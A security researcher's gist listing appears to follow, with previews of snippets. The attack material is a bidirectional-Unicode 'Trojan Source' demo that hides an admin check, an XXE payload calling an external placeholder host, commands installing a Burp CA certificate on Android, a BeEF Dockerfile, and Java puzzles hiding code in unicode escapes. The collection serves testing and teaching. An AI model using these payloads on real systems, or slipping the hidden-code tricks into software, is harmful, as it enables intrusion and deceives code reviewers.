let isAdmin = false
/*‮ } ⁦if(isAdmin)⁩ ⁦ begin admins only */
console.log("you are an admin")
/* end admin only ‮ { ⁦ */
@eoftedal
eoftedal / default.conf
Last active April 20, 2020 16:50
Automatically adding forwarded/created x-b3-traceid to proxy_pass in nginx
map $http_x_b3_traceid $b3traceid {
    "~^(?<traceid>[a-f0-9]{32})$" $traceid;
    default $request_id;
}
proxy_set_header x-b3-traceId $b3traceid;
@eoftedal
eoftedal / dep-check.sh
Created November 22, 2019 08:25
Scan an image using OWASP Dependency check
#!/bin/bash
export COLOR_NC=$(tput sgr0)
export COLOR_GREEN=$(tput setaf 2)
if [ $# -ne 2 ]; then
    echo "ERROR: no image given"
    echo "USAGE: ./scan.sh <some_image>[:some_tag] <path in image>"
    exit 1
fi
@eoftedal
eoftedal / xss-polyglots.txt
Created October 10, 2019 16:57 — forked from michenriksen/xss-polyglots.txt
XSS Polyglot payloads
@eoftedal
eoftedal / XXE_payloads
Created July 7, 2017 14:49 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
http://techblog.vsza.hu/posts/Using_Android_emulator_with_Burp_Suite.html
adb shell mount -o rw,remount /system
openssl x509 -in burp.cer -inform DER -text
openssl x509 -noout -subject_hash_old -inform DER -in burp.cer
adb push burp.cer /system/etc/security/cacerts/9a5ba575.0
@eoftedal
eoftedal / Dockerfile
Last active November 19, 2015 12:05
Dockerfile for BeEF
FROM ubuntu
RUN apt-get update && apt-get upgrade -y && apt-get install -y build-essential libsqlite3-dev sqlite3 libssl-dev curl
RUN apt-get install -y software-properties-common && \
    apt-add-repository -y ppa:brightbox/ruby-ng && \
    apt-get update && \
    apt-get install -y ruby2.1 ruby2.1-dev
WORKDIR /opt/
RUN locale-gen en_US.UTF-8
ENV LC_ALL en_US.UTF-8
RUN curl https://codeload.github.com/beefproject/beef/tar.gz/beef-0.4.6.1 -o beef-0.4.6.1.tar.gz && \
@eoftedal
eoftedal / Puzzle.java
Created April 24, 2015 09:44
What is printed?
public class Puzzle {
    public static void main(String[] args) {
        String a = "1";
        String b = "\u0022\u003b\u0061\u003d\u0022\u0032\u0022\u003b\u002f\u002f";
        System.out.println(a);
    }
}
import java.security.SecureRandom;
import java.math.BigInteger;
public class Lottery {
    private static SecureRandom random = new SecureRandom();
    public static void main(String[] args) {
        /*
****************************************************************************************************************************************
@eoftedal
eoftedal / Lottery.java
Last active August 29, 2015 14:19
Crazy stuff
import java.security.SecureRandom;
import java.math.BigInteger;
public class Lottery {
    private static SecureRandom random = new SecureRandom();
    public static void main(String[] args) {
        String lotteryNumber = new BigInteger(130, random).toString(32);
        /* Used when testing \u002a\u002f
        lotteryNumber = "123";